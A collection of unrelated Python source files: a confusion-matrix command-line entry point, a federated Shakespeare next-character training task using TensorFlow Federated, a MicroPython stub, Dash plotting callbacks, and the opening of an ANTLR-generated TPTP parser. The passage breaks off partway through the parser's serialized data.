parser.add_argument("-t", "--matrix_type", dest="matrix_type", metavar="TYPE", required=False, default=MatrixType.COUNTS, choices=list(MatrixType), type=MatrixType.argparse, help="the type of matrix to generate")
parsed = parser.parse_args(args=args)
labels = None if parsed.labels is None else parsed.labels.split(",")
generate(parsed.input_file, parsed.output_file, parsed.col_act, parsed.col_pred,
col_weight=parsed.col_weight, matrix_type=parsed.matrix_type,
delimiter=parsed.delimiter, quotechar=parsed.quotechar, header=parsed.header, labels=labels,
prefix_act=parsed.prefix_act, prefix_pred=parsed.prefix_pred, corner=parsed.corner,
output_format=parsed.output_format, max_decimals=parsed.max_decimals)
def sys_main():
"""
Runs the main function using the system cli arguments, and
returns a system error code.
:return: 0 for success, 1 for failure.
:rtype: int
"""
try:
main()
return 0
except Exception:
print(traceback.format_exc())
return 1
if __name__ == "__main__":
try:
main()
except Exception:
print(traceback.format_exc())
|
py | b414dc57843206ea22226c6c8e16cc0cc1e96f12 | from saturnv.api import configuration
if configuration.Defaults.model == configuration.Engines.postgres:
from saturnv.api.models import postgresql as model
if configuration.Defaults.repository == configuration.Engines.postgres:
from saturnv.api.repositories import postgresql as repository
if configuration.Defaults.engine == configuration.Engines.postgres:
from saturnv.api.databases import postgresql as database
|
py | b414dcc707a2aa298d291f60d3bb02a97ca42b86 | # Copyright 2019, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated Shakespeare next character prediction library using TFF."""
import functools
import tensorflow as tf
import tensorflow_federated as tff
from optimization.tasks import training_specs
from utils import keras_metrics
from utils.datasets import shakespeare_dataset
from utils.models import shakespeare_models
# Vocabulary with OOV ID, zero for the padding, and BOS, EOS IDs.
VOCAB_SIZE = len(shakespeare_dataset.CHAR_VOCAB) + 4
def create_shakespeare_model(sequence_length):
"""Constructs a `tf.keras.Model` to train."""
return shakespeare_models.create_recurrent_model(
vocab_size=VOCAB_SIZE, sequence_length=sequence_length)
def metrics_builder():
"""Returns a `list` of `tf.keras.metric.Metric` objects."""
pad_token, _, _, _ = shakespeare_dataset.get_special_tokens()
return [
keras_metrics.NumBatchesCounter(),
keras_metrics.NumExamplesCounter(),
keras_metrics.NumTokensCounter(masked_tokens=[pad_token]),
keras_metrics.MaskedCategoricalAccuracy(masked_tokens=[pad_token]),
]
def eval_metrics_builder():
pad_token, _, _, _ = shakespeare_dataset.get_special_tokens()
return [
tf.keras.metrics.SparseCategoricalCrossentropy(),
keras_metrics.MaskedCategoricalAccuracy(masked_tokens=[pad_token]),
]
def configure_training(task_spec: training_specs.TaskSpec,
sequence_length: int = 80) -> training_specs.RunnerSpec:
"""Configures training for the Shakespeare next-character prediction task.
This method will load and pre-process datasets and construct a model used for
the task. It then uses `iterative_process_builder` to create an iterative
process compatible with `federated_research.utils.training_loop`.
Args:
task_spec: A `TaskSpec` class for creating federated training tasks.
sequence_length: An int specifying the length of the character sequences
used for prediction.
Returns:
A `RunnerSpec` containing attributes used for running the newly created
federated task.
"""
shakespeare_train, _ = tff.simulation.datasets.shakespeare.load_data()
_, shakespeare_test = shakespeare_dataset.get_centralized_datasets(
sequence_length=sequence_length)
train_preprocess_fn = shakespeare_dataset.create_preprocess_fn(
num_epochs=task_spec.client_epochs_per_round,
batch_size=task_spec.client_batch_size,
sequence_length=sequence_length)
input_spec = train_preprocess_fn.type_signature.result.element
model_builder = functools.partial(
create_shakespeare_model, sequence_length=sequence_length)
loss_builder = functools.partial(
tf.keras.losses.SparseCategoricalCrossentropy, from_logits=True)
def tff_model_fn() -> tff.learning.Model:
return tff.learning.from_keras_model(
keras_model=model_builder(),
input_spec=input_spec,
loss=loss_builder(),
metrics=metrics_builder())
iterative_process = task_spec.iterative_process_builder(tff_model_fn)
@tff.tf_computation(tf.string)
def build_train_dataset_from_client_id(client_id):
client_dataset = shakespeare_train.dataset_computation(client_id)
return train_preprocess_fn(client_dataset)
training_process = tff.simulation.compose_dataset_computation_with_iterative_process(
build_train_dataset_from_client_id, iterative_process)
client_ids_fn = functools.partial(
tff.simulation.build_uniform_sampling_fn(
shakespeare_train.client_ids,
replace=False,
random_seed=task_spec.client_datasets_random_seed),
size=task_spec.clients_per_round)
# We convert the output to a list (instead of an np.ndarray) so that it can
# be used as input to the iterative process.
client_sampling_fn = lambda x: list(client_ids_fn(x))
training_process.get_model_weights = iterative_process.get_model_weights
evaluate_fn = tff.learning.build_federated_evaluation(tff_model_fn)
def test_fn(state):
return evaluate_fn(
iterative_process.get_model_weights(state), [shakespeare_test])
def validation_fn(state, round_num):
del round_num
return evaluate_fn(
iterative_process.get_model_weights(state), [shakespeare_test])
return training_specs.RunnerSpec(
iterative_process=training_process,
client_datasets_fn=client_sampling_fn,
validation_fn=validation_fn,
test_fn=test_fn)
|
py | b414dd2c8df02cd0d8412830132268d0840b7bdd | """
Module: 'uasyncio.funcs' on pyboard 1.13.0-95
"""
# MCU: (sysname='pyboard', nodename='pyboard', release='1.13.0', version='v1.13-95-g0fff2e03f on 2020-10-03', machine='PYBv1.1 with STM32F405RG')
# Stubber: 1.3.4
core = None
gather = None
wait_for = None
def wait_for_ms():
pass
|
py | b414ddb8a4a5ecf95b6f5e8d7903921be5256b33 | import dash
import plotly.graph_objects as go
from dash.dependencies import Input, Output, State
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dashboard import app_data
def _update_yaxis_range(xaxis_range, fig):
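"""Rescale the y-axis so it fits only the data visible in the new x-range.
Triggered by `relayoutData` from the range slider; returns the updated
figure, or `dash.no_update` if the event carries no x-range change.
"""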
if fig is None or xaxis_range is None or "xaxis.range" not in xaxis_range:
return dash.no_update
# Get new range
begin, end = xaxis_range["xaxis.range"]
# Find max y in the new range
data = zip(fig["data"][0]["x"], fig["data"][0]["y"])
y_max = max([y for x, y in data if x >= begin and x <= end])
# Make sure range slider does not change range
fig["layout"]["xaxis"]["rangeslider"]["yaxis"]["range"] = [
min(fig["data"][0]["y"]) - 0.05 * max(fig["data"][0]["y"]),
1.05 * max(fig["data"][0]["y"]),
]
fig["layout"]["xaxis"]["rangeslider"]["yaxis"]["rangemode"] = "normal"
# Change range of graph
fig["layout"]["yaxis"]["range"][0] = 0 - 0.05 * y_max
fig["layout"]["yaxis"]["range"][1] = 1.05 * y_max
fig["layout"]["yaxis"]["autorange"] = False
return fig
def gen_col_plot_from_cases_callbacks(
x,
y,
initial_trigger_id,
parent_id,
app,
hovertemplate="<b>%{x}</b><br>%{y:,.2f}<extra></extra>"):
"""
Args:
x: x col name (should be date).
y: y col name.
initial_trigger_id: component ID that triggers initial rendering.
parent_id: component ID of the parent element.
app: dash.Dash instance.
"""
def _render_plot(_):
cases = app_data.read_cases()
fig = go.Figure(data=[
go.Scatter(
x=pd.to_datetime(cases[x]),
y=cases[y],
hovertemplate=hovertemplate,
),
], )
fig.update_xaxes(rangeslider_visible=True, showspikes=True)
fig.update_yaxes(showspikes=True)
fig.layout.margin = go.layout.Margin(t=0, b=0, l=0, r=0)
return dcc.Graph(figure=fig,
config={
"displaylogo":
False,
"displayModeBar":
False,
"modeBarButtonsToRemove":
["toggleSpikelines", "autoScale2d"],
},
id=f"{parent_id:s}-graph")
return (
app.callback(
Output(parent_id, "children"),
Input(initial_trigger_id, "children"),
)(_render_plot),
app.callback(
Output(f"{parent_id:s}-graph", "figure"),
Input(f"{parent_id:s}-graph", "relayoutData"),
State(f"{parent_id:s}-graph", "figure"),
)(_update_yaxis_range),
)
def _update_double_yaxis_range(xaxis_range, fig):
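"""Rescale both y-axes (primary and secondary) so each fits only the data visible in the new x-range."""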
if fig is None or xaxis_range is None or "xaxis.range" not in xaxis_range:
return dash.no_update
# Get new range
begin, end = xaxis_range["xaxis.range"]
# Find max y in the new range
data = zip(fig["data"][0]["x"], fig["data"][0]["y"])
y_max1 = max([y for x, y in data if x >= begin and x <= end])
data = zip(fig["data"][1]["x"], fig["data"][1]["y"])
y_max2 = max([y for x, y in data if x >= begin and x <= end])
# Make sure range slider does not change range
for i, yaxis in enumerate(["yaxis", "yaxis2"]):
fig["layout"]["xaxis"]["rangeslider"][yaxis]["range"] = [
min(fig["data"][i]["y"]) - 0.05 * max(fig["data"][i]["y"]),
1.05 * max(fig["data"][i]["y"]),
]
fig["layout"]["xaxis"]["rangeslider"][yaxis]["rangemode"] = "normal"
# Change range of graph
fig["layout"]["yaxis"]["range"][1] = 1.05 * y_max1
fig["layout"]["yaxis"]["autorange"] = False
fig["layout"]["yaxis2"]["range"][1] = 1.05 * y_max2
fig["layout"]["yaxis2"]["autorange"] = False
return fig
def gen_2_cols_plot_from_cases_callbacks(
x,
y1,
y2,
y1_name,
y2_name,
initial_trigger_id,
parent_id,
app,
hovertemplate="<b>%{x}</b><br>%{y:,.2f}<extra></extra>"):
"""
Args:
x: x col name (should be date).
y1: y col name.
y2: the other y col name.
y1_name: y col display name.
y2_name: the other y col display name.
initial_trigger_id: component ID that triggers initial rendering.
parent_id: component ID of the parent element.
app: dash.Dash instance.
"""
cases = app_data.read_cases()
def _render_plot(_):
fig = go.Figure(
data=[
go.Scatter(
x=pd.to_datetime(cases[x]),
y=cases[y1],
name=y1_name,
yaxis="y1",
hovertemplate=hovertemplate,
),
go.Scatter(
x=pd.to_datetime(cases[x]),
y=cases[y2],
name=y2_name,
yaxis="y2",
hovertemplate=hovertemplate,
),
],
layout=go.Layout(
yaxis=dict(title=y1_name),
yaxis2=dict(title=y2_name, overlaying="y", side="right"),
legend=dict(x=0, y=1),
),
)
fig.update_xaxes(rangeslider_visible=True, showspikes=True)
fig.update_yaxes(showspikes=True, rangemode="tozero")
fig.layout.margin = go.layout.Margin(t=0, b=0, l=0, r=0)
return dcc.Graph(figure=fig,
config={
"displaylogo":
False,
"displayModeBar":
False,
"modeBarButtonsToRemove":
["toggleSpikelines", "autoScale2d"],
},
id=f"{parent_id}-graph")
return (
app.callback(
Output(parent_id, "children"),
Input(initial_trigger_id, "children"),
)(_render_plot),
app.callback(
Output(f"{parent_id:s}-graph", "figure"),
Input(f"{parent_id:s}-graph", "relayoutData"),
State(f"{parent_id:s}-graph", "figure"),
)(_update_double_yaxis_range),
)
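# Illustrative usage (the component IDs and column names below are assumptions, not part of this module):
# app = dash.Dash(__name__)
# gen_col_plot_from_cases_callbacks(
#     x="date", y="confirmed",
#     initial_trigger_id="initial-trigger", parent_id="confirmed-plot", app=app)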
|
py | b414e12dcea5b2469f825b9327fd2dead51300c8 | # Generated from ../TPTP-ANTLR4-Grammar/tptp_v7_0_0_0.g4 by ANTLR 4.9
# encoding: utf-8
from antlr4 import *
from io import StringIO
import sys
if sys.version_info[1] > 5:
from typing import TextIO
else:
from typing.io import TextIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3e")
buf.write("\u0668\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
buf.write("\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:\4;\t")
buf.write(";\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\tC\4D\t")
buf.write("D\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\tL\4M\t")
buf.write("M\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\tU\4V\t")
buf.write("V\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4^\t^\4")
buf.write("_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4g\tg\4")
buf.write("h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4p\tp\4")
buf.write("q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\4x\tx\4y\ty\4")
buf.write("z\tz\4{\t{\4|\t|\4}\t}\4~\t~\4\177\t\177\4\u0080\t\u0080")
buf.write("\4\u0081\t\u0081\4\u0082\t\u0082\4\u0083\t\u0083\4\u0084")
buf.write("\t\u0084\4\u0085\t\u0085\4\u0086\t\u0086\4\u0087\t\u0087")
buf.write("\4\u0088\t\u0088\4\u0089\t\u0089\4\u008a\t\u008a\4\u008b")
buf.write("\t\u008b\4\u008c\t\u008c\4\u008d\t\u008d\4\u008e\t\u008e")
buf.write("\4\u008f\t\u008f\4\u0090\t\u0090\4\u0091\t\u0091\4\u0092")
buf.write("\t\u0092\4\u0093\t\u0093\4\u0094\t\u0094\4\u0095\t\u0095")
buf.write("\4\u0096\t\u0096\4\u0097\t\u0097\4\u0098\t\u0098\4\u0099")
buf.write("\t\u0099\4\u009a\t\u009a\4\u009b\t\u009b\4\u009c\t\u009c")
buf.write("\4\u009d\t\u009d\4\u009e\t\u009e\4\u009f\t\u009f\4\u00a0")
buf.write("\t\u00a0\4\u00a1\t\u00a1\4\u00a2\t\u00a2\4\u00a3\t\u00a3")
buf.write("\4\u00a4\t\u00a4\4\u00a5\t\u00a5\4\u00a6\t\u00a6\4\u00a7")
buf.write("\t\u00a7\4\u00a8\t\u00a8\4\u00a9\t\u00a9\4\u00aa\t\u00aa")
buf.write("\4\u00ab\t\u00ab\4\u00ac\t\u00ac\4\u00ad\t\u00ad\4\u00ae")
buf.write("\t\u00ae\4\u00af\t\u00af\4\u00b0\t\u00b0\4\u00b1\t\u00b1")
buf.write("\4\u00b2\t\u00b2\4\u00b3\t\u00b3\4\u00b4\t\u00b4\4\u00b5")
buf.write("\t\u00b5\4\u00b6\t\u00b6\4\u00b7\t\u00b7\4\u00b8\t\u00b8")
buf.write("\4\u00b9\t\u00b9\4\u00ba\t\u00ba\4\u00bb\t\u00bb\4\u00bc")
buf.write("\t\u00bc\4\u00bd\t\u00bd\4\u00be\t\u00be\4\u00bf\t\u00bf")
buf.write("\4\u00c0\t\u00c0\4\u00c1\t\u00c1\4\u00c2\t\u00c2\4\u00c3")
buf.write("\t\u00c3\4\u00c4\t\u00c4\4\u00c5\t\u00c5\4\u00c6\t\u00c6")
buf.write("\4\u00c7\t\u00c7\4\u00c8\t\u00c8\4\u00c9\t\u00c9\4\u00ca")
buf.write("\t\u00ca\3\2\7\2\u0196\n\2\f\2\16\2\u0199\13\2\3\2\3\2")
buf.write("\3\3\3\3\5\3\u019f\n\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\5\4")
buf.write("\u01a8\n\4\3\5\3\5\3\5\3\5\3\5\3\5\3\5\5\5\u01b1\n\5\3")
buf.write("\5\3\5\3\6\3\6\3\7\3\7\3\7\3\7\3\7\3\7\3\7\5\7\u01be\n")
buf.write("\7\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\b\5\b\u01c9\n\b\3")
buf.write("\b\3\b\3\t\3\t\3\t\3\t\3\t\3\t\3\t\5\t\u01d4\n\t\3\t\3")
buf.write("\t\3\n\3\n\3\n\3\n\3\n\3\n\3\n\5\n\u01df\n\n\3\n\3\n\3")
buf.write("\13\3\13\3\13\3\13\3\13\3\13\3\13\5\13\u01ea\n\13\3\13")
buf.write("\3\13\3\f\3\f\3\f\3\f\3\f\3\f\3\f\5\f\u01f5\n\f\3\f\3")
buf.write("\f\3\r\3\r\3\r\5\r\u01fc\n\r\3\16\3\16\3\17\3\17\5\17")
buf.write("\u0202\n\17\3\20\3\20\3\20\3\20\5\20\u0208\n\20\3\21\3")
buf.write("\21\3\21\5\21\u020d\n\21\3\22\3\22\3\22\3\22\3\23\3\23")
buf.write("\3\23\5\23\u0216\n\23\3\24\3\24\3\24\3\24\3\24\3\24\3")
buf.write("\24\3\24\7\24\u0220\n\24\f\24\16\24\u0223\13\24\3\25\3")
buf.write("\25\3\25\3\25\3\25\3\25\3\25\3\25\7\25\u022d\n\25\f\25")
buf.write("\16\25\u0230\13\25\3\26\3\26\3\26\3\26\3\26\3\26\3\26")
buf.write("\3\26\7\26\u023a\n\26\f\26\16\26\u023d\13\26\3\27\3\27")
buf.write("\3\27\3\27\3\27\3\27\3\27\3\27\3\27\3\27\5\27\u0249\n")
buf.write("\27\3\30\3\30\3\30\3\31\3\31\3\31\3\31\3\31\3\31\3\32")
buf.write("\3\32\3\32\7\32\u0257\n\32\f\32\16\32\u025a\13\32\3\33")
buf.write("\3\33\5\33\u025e\n\33\3\34\3\34\3\34\3\34\3\35\3\35\3")
buf.write("\35\3\35\3\35\3\36\3\36\3\36\3\36\5\36\u026d\n\36\3\37")
buf.write("\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37\3\37")
buf.write("\3\37\3\37\3\37\3\37\5\37\u027f\n\37\3 \3 \3 \5 \u0284")
buf.write("\n \3!\3!\3!\3!\3!\3!\3!\3!\3\"\3\"\3\"\3\"\3\"\3\"\3")
buf.write("#\3#\3$\3$\3$\3$\3%\3%\3%\3%\3%\5%\u029f\n%\3&\3&\3&\3")
buf.write("&\3\'\3\'\3\'\5\'\u02a8\n\'\3(\3(\3)\3)\3*\3*\3*\5*\u02b1")
buf.write("\n*\3+\3+\3+\3+\3+\3+\3+\3+\5+\u02bb\n+\3,\3,\3,\3,\3")
buf.write(",\3,\3,\3,\7,\u02c5\n,\f,\16,\u02c8\13,\3-\3-\3-\3-\3")
buf.write("-\3-\3-\3-\7-\u02d2\n-\f-\16-\u02d5\13-\3.\3.\3.\3.\3")
buf.write(".\3.\3.\3.\5.\u02df\n.\3/\3/\3/\3/\3/\3/\3/\3/\3/\3/\5")
buf.write("/\u02eb\n/\3\60\3\60\3\60\7\60\u02f0\n\60\f\60\16\60\u02f3")
buf.write("\13\60\3\61\3\61\5\61\u02f7\n\61\3\62\3\62\3\63\3\63\3")
buf.write("\63\5\63\u02fe\n\63\3\64\3\64\3\64\5\64\u0303\n\64\3\65")
buf.write("\3\65\5\65\u0307\n\65\3\66\3\66\3\66\3\66\3\67\3\67\5")
buf.write("\67\u030f\n\67\38\38\38\38\38\38\38\38\78\u0319\n8\f8")
buf.write("\168\u031c\138\39\39\39\39\39\39\39\39\79\u0326\n9\f9")
buf.write("\169\u0329\139\3:\3:\3:\3:\3:\3:\3:\3:\3:\5:\u0334\n:")
buf.write("\3;\3;\3;\3;\3;\3;\3;\3<\3<\3<\7<\u0340\n<\f<\16<\u0343")
buf.write("\13<\3=\3=\5=\u0347\n=\3>\3>\3>\3>\3?\3?\3?\3?\5?\u0351")
buf.write("\n?\3@\3@\3A\3A\3A\3A\3A\3A\3A\3A\3B\3B\3B\3B\3B\3B\3")
buf.write("B\3B\3B\3B\3B\3B\5B\u0369\nB\3C\3C\3C\3C\3C\5C\u0370\n")
buf.write("C\3D\3D\3D\7D\u0375\nD\fD\16D\u0378\13D\3E\3E\3E\3E\3")
buf.write("E\3E\3E\3E\5E\u0382\nE\3F\3F\3F\3F\3F\3F\3F\3F\5F\u038c")
buf.write("\nF\3G\3G\3G\3G\3G\5G\u0393\nG\3H\3H\3H\7H\u0398\nH\f")
buf.write("H\16H\u039b\13H\3I\3I\3I\3I\3I\3I\3I\3I\5I\u03a5\nI\3")
buf.write("J\3J\3J\3J\3J\3J\3J\3J\5J\u03af\nJ\3K\3K\3K\3K\3K\3K\3")
buf.write("K\3K\5K\u03b9\nK\3L\3L\3L\3L\3L\5L\u03c0\nL\3M\3M\3M\7")
buf.write("M\u03c5\nM\fM\16M\u03c8\13M\3N\3N\3N\3N\3N\3N\3N\3N\5")
buf.write("N\u03d2\nN\3O\3O\3O\3O\3P\3P\3P\3P\3P\3P\3P\5P\u03df\n")
buf.write("P\3Q\3Q\3Q\3Q\3Q\3Q\3Q\3R\3R\3R\3R\3R\5R\u03ed\nR\3S\3")
buf.write("S\3S\3S\3S\5S\u03f4\nS\3T\3T\3T\3T\3T\3T\3T\3T\5T\u03fe")
buf.write("\nT\3U\3U\3U\7U\u0403\nU\fU\16U\u0406\13U\3V\3V\3V\3V")
buf.write("\3W\3W\3W\3W\3W\3W\3W\3W\7W\u0414\nW\fW\16W\u0417\13W")
buf.write("\3X\3X\5X\u041b\nX\3Y\3Y\5Y\u041f\nY\3Z\3Z\3Z\3Z\3Z\3")
buf.write("Z\3Z\3[\3[\5[\u042a\n[\3\\\3\\\5\\\u042e\n\\\3]\3]\5]")
buf.write("\u0432\n]\3^\3^\3^\3^\3_\3_\5_\u043a\n_\3`\3`\3`\3`\3")
buf.write("`\3`\3`\3`\7`\u0444\n`\f`\16`\u0447\13`\3a\3a\3a\3a\3")
buf.write("a\3a\3a\3a\7a\u0451\na\fa\16a\u0454\13a\3b\3b\3b\3b\3")
buf.write("b\3b\3b\5b\u045d\nb\3c\3c\3c\3c\3c\3c\3c\3d\3d\3d\7d\u0469")
buf.write("\nd\fd\16d\u046c\13d\3e\3e\3e\3e\5e\u0472\ne\3f\3f\3f")
buf.write("\3f\3g\3g\3g\5g\u047b\ng\3h\3h\3i\3i\5i\u0481\ni\3j\3")
buf.write("j\3k\3k\3k\3k\3l\3l\3m\3m\3m\3m\3m\3m\5m\u0491\nm\3n\3")
buf.write("n\5n\u0495\nn\3o\3o\3p\3p\3p\3p\3p\3p\5p\u049f\np\3q\3")
buf.write("q\3q\3q\3q\3q\5q\u04a7\nq\3r\3r\3r\7r\u04ac\nr\fr\16r")
buf.write("\u04af\13r\3s\3s\3s\3s\3s\5s\u04b6\ns\3t\3t\3t\5t\u04bb")
buf.write("\nt\3u\3u\3u\3u\3u\3u\3u\3u\3v\3v\3v\3v\3v\3v\3v\3v\3")
buf.write("v\3v\3v\3v\5v\u04d1\nv\3w\3w\3w\3w\3w\5w\u04d8\nw\3x\3")
buf.write("x\3x\3x\3x\3x\3x\3x\5x\u04e2\nx\3y\3y\3y\3y\3y\5y\u04e9")
buf.write("\ny\3z\3z\3z\7z\u04ee\nz\fz\16z\u04f1\13z\3{\3{\3{\3{")
buf.write("\3{\5{\u04f8\n{\3|\3|\3|\3|\3|\3|\7|\u0500\n|\f|\16|\u0503")
buf.write("\13|\3}\3}\3}\3}\5}\u0509\n}\3~\3~\3~\5~\u050e\n~\3\177")
buf.write("\3\177\3\u0080\3\u0080\3\u0081\3\u0081\3\u0081\3\u0081")
buf.write("\5\u0081\u0518\n\u0081\3\u0082\3\u0082\5\u0082\u051c\n")
buf.write("\u0082\3\u0083\3\u0083\3\u0084\3\u0084\5\u0084\u0522\n")
buf.write("\u0084\3\u0085\3\u0085\3\u0086\3\u0086\3\u0087\3\u0087")
buf.write("\3\u0088\3\u0088\3\u0089\3\u0089\3\u008a\3\u008a\3\u008b")
buf.write("\3\u008b\3\u008c\3\u008c\3\u008d\3\u008d\5\u008d\u0536")
buf.write("\n\u008d\3\u008e\3\u008e\5\u008e\u053a\n\u008e\3\u008f")
buf.write("\3\u008f\3\u0090\3\u0090\3\u0091\3\u0091\3\u0092\3\u0092")
buf.write("\3\u0093\3\u0093\3\u0094\3\u0094\3\u0095\3\u0095\3\u0096")
buf.write("\3\u0096\3\u0097\3\u0097\3\u0098\3\u0098\5\u0098\u0550")
buf.write("\n\u0098\3\u0099\3\u0099\3\u009a\3\u009a\3\u009a\3\u009a")
buf.write("\3\u009a\3\u009a\3\u009a\3\u009a\5\u009a\u055c\n\u009a")
buf.write("\3\u009b\3\u009b\3\u009b\7\u009b\u0561\n\u009b\f\u009b")
buf.write("\16\u009b\u0564\13\u009b\3\u009c\3\u009c\5\u009c\u0568")
buf.write("\n\u009c\3\u009d\3\u009d\3\u009d\3\u009d\3\u009d\3\u009d")
buf.write("\3\u009d\3\u009d\3\u009e\3\u009e\3\u009f\3\u009f\3\u009f")
buf.write("\3\u009f\3\u009f\5\u009f\u0579\n\u009f\3\u00a0\3\u00a0")
buf.write("\3\u00a0\7\u00a0\u057e\n\u00a0\f\u00a0\16\u00a0\u0581")
buf.write("\13\u00a0\3\u00a1\3\u00a1\5\u00a1\u0585\n\u00a1\3\u00a2")
buf.write("\3\u00a2\3\u00a2\3\u00a3\3\u00a3\3\u00a3\5\u00a3\u058d")
buf.write("\n\u00a3\3\u00a3\3\u00a3\3\u00a4\3\u00a4\3\u00a5\3\u00a5")
buf.write("\3\u00a5\5\u00a5\u0596\n\u00a5\3\u00a6\3\u00a6\3\u00a6")
buf.write("\5\u00a6\u059b\n\u00a6\3\u00a6\3\u00a6\3\u00a7\3\u00a7")
buf.write("\3\u00a7\3\u00a8\3\u00a8\3\u00a8\5\u00a8\u05a5\n\u00a8")
buf.write("\3\u00a8\3\u00a8\3\u00a9\3\u00a9\3\u00aa\3\u00aa\3\u00aa")
buf.write("\5\u00aa\u05ae\n\u00aa\3\u00aa\3\u00aa\3\u00ab\3\u00ab")
buf.write("\3\u00ac\3\u00ac\3\u00ac\3\u00ad\3\u00ad\3\u00ad\3\u00ad")
buf.write("\3\u00ad\3\u00ad\5\u00ad\u05bd\n\u00ad\3\u00ae\3\u00ae")
buf.write("\3\u00ae\7\u00ae\u05c2\n\u00ae\f\u00ae\16\u00ae\u05c5")
buf.write("\13\u00ae\3\u00af\3\u00af\3\u00af\5\u00af\u05ca\n\u00af")
buf.write("\3\u00b0\3\u00b0\5\u00b0\u05ce\n\u00b0\3\u00b1\3\u00b1")
buf.write("\3\u00b1\3\u00b1\3\u00b2\3\u00b2\3\u00b2\3\u00b2\3\u00b3")
buf.write("\3\u00b3\3\u00b3\3\u00b3\5\u00b3\u05dc\n\u00b3\3\u00b4")
buf.write("\3\u00b4\3\u00b4\3\u00b4\3\u00b4\5\u00b4\u05e3\n\u00b4")
buf.write("\3\u00b5\3\u00b5\3\u00b6\3\u00b6\3\u00b6\3\u00b6\3\u00b6")
buf.write("\3\u00b6\3\u00b6\3\u00b7\3\u00b7\3\u00b7\3\u00b7\3\u00b7")
buf.write("\3\u00b7\3\u00b8\3\u00b8\3\u00b8\3\u00b8\3\u00b9\3\u00b9")
buf.write("\3\u00b9\3\u00b9\3\u00b9\3\u00b9\3\u00b9\3\u00b9\3\u00ba")
buf.write("\3\u00ba\3\u00ba\7\u00ba\u0603\n\u00ba\f\u00ba\16\u00ba")
buf.write("\u0606\13\u00ba\3\u00bb\3\u00bb\5\u00bb\u060a\n\u00bb")
buf.write("\3\u00bc\3\u00bc\3\u00bc\5\u00bc\u060f\n\u00bc\3\u00bc")
buf.write("\3\u00bc\3\u00bd\3\u00bd\3\u00bd\3\u00bd\3\u00bd\3\u00be")
buf.write("\3\u00be\3\u00be\7\u00be\u061b\n\u00be\f\u00be\16\u00be")
buf.write("\u061e\13\u00be\3\u00bf\3\u00bf\3\u00bf\3\u00bf\3\u00bf")
buf.write("\3\u00bf\5\u00bf\u0626\n\u00bf\3\u00c0\3\u00c0\3\u00c0")
buf.write("\3\u00c0\3\u00c0\3\u00c0\5\u00c0\u062e\n\u00c0\3\u00c1")
buf.write("\3\u00c1\3\u00c1\3\u00c1\3\u00c1\3\u00c2\3\u00c2\3\u00c2")
buf.write("\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2")
buf.write("\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2\3\u00c2")
buf.write("\3\u00c2\3\u00c2\3\u00c2\5\u00c2\u0649\n\u00c2\3\u00c3")
buf.write("\3\u00c3\3\u00c3\3\u00c3\3\u00c3\5\u00c3\u0650\n\u00c3")
buf.write("\3\u00c4\3\u00c4\3\u00c4\7\u00c4\u0655\n\u00c4\f\u00c4")
buf.write("\16\u00c4\u0658\13\u00c4\3\u00c5\3\u00c5\5\u00c5\u065c")
buf.write("\n\u00c5\3\u00c6\3\u00c6\3\u00c7\3\u00c7\3\u00c8\3\u00c8")
buf.write("\3\u00c9\3\u00c9\3\u00ca\3\u00ca\3\u00ca\2\r&(*VXnp\u00ac")
buf.write("\u00be\u00c0\u00f6\u00cb\2\4\6\b\n\f\16\20\22\24\26\30")
buf.write("\32\34\36 \"$&(*,.\60\62\64\668:<>@BDFHJLNPRTVXZ\\^`b")
buf.write("dfhjlnprtvxz|~\u0080\u0082\u0084\u0086\u0088\u008a\u008c")
buf.write("\u008e\u0090\u0092\u0094\u0096\u0098\u009a\u009c\u009e")
buf.write("\u00a0\u00a2\u00a4\u00a6\u00a8\u00aa\u00ac\u00ae\u00b0")
buf.write("\u00b2\u00b4\u00b6\u00b8\u00ba\u00bc\u00be\u00c0\u00c2")
buf.write("\u00c4\u00c6\u00c8\u00ca\u00cc\u00ce\u00d0\u00d2\u00d4")
buf.write("\u00d6\u00d8\u00da\u00dc\u00de\u00e0\u00e2\u00e4\u00e6")
buf.write("\u00e8\u00ea\u00ec\u00ee\u00f0\u00f2\u00f4\u00f6\u00f8")
buf.write("\u00fa\u00fc\u00fe\u0100\u0102\u0104\u0106\u0108\u010a")
